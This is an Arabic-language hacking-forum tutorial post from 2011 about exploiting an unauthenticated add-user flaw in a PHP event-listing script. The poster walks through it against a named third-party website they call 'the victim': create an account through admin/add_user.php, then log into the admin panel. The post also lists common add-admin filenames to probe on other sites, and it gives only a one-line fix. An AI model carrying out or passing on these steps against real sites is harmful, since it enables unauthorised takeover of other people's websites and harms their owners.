التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. الـقرصـنـة والأختراق ~ The Hidden World Of Hackers .:: ] > قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات

 
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 05-29-2011, 04:57 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية bleu moon
 

 

 
إحصائية العضو








bleu moon غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 12
bleu moon is on a distinguished road

.... =>|| شرح + استغلال ثغرآت الـ Add Admin


السلآم عليكم


كيفكم ياشبآب ؟

اليوم درسنآ بيكون تطبيق مبآشر على ثغرة add user

تحصلوها على الرآبط التآلي :
http://www.exploit-db.com/exploits/10515/


الثغرة في سكربت : Basic php-events lister2


=================================


The exploit :
Get in :

http://localhost/path/admin/add_user.php

and add your user ..

Example : r7e@hotmail.com - 123456

Then get in :

http://localhost/path/admin/login.php


=================================



------------------------------------------

شرح exploit

يعني الاستغلال

http://localhost/path/admin/add_user.php

http://localhost <<< الموقع المصاب
/path/ <<< الملف المصاب
admin <<< مجلد الآدمن او لوحتة الادارة ...
/add_user.php <<< من اسمووووا ضاهر شو بيعمل
اضافة يوزر جديد



------------------------------------------

################################################## ###

انا جبت الضحيه


http://easttexassolutions.com/events


نجي للتطبيق !

http://easttexassolutions.com/events

بعدها الى هنا

admin/add_user.php


يعني هيك

http://easttexassolutions.com/events/admin/add_user.php

الآن ادخل ايمايلك + الباس

^_^

username and password successfuly inserted!

Login successful!


بعدها

http://easttexassolutions.com/events/admin

get your msn + pass ...



الآن انت داخل لوحة تحكم الآدمن

:D


################################################## ###


*************************************************

تم استغلآل الثغرة بنجآح

ملاحضة مهمة :

بآقلكم ثغرآت الـ Add Admin عآدة لها ملفآت محدده ووآضحه

مثل


addadmin.php

add_admin.php

admin_add.php

user_add.php

add_user.php

...

وعآدة تكون ورآ لوحة التحكم ADMIN or cpanel ...



تغرة جميلة ؟

:love:


///////////////////////////////////////////////



طريقة الترقيع بسيطة وهي حذف ملف add_user.php or ...









=>|| avp + hsjyghg eyvNj hgJ Add Admin add user


التعديل الأخير تم بواسطة KaLa$nikoV ; 05-29-2011 الساعة 09:28 PM.

   

رد مع اقتباس
 

مواقع النشر (المفضلة)

الكلمات الدليلية (Tags)
add user


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع


الساعة الآن 12:10 PM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0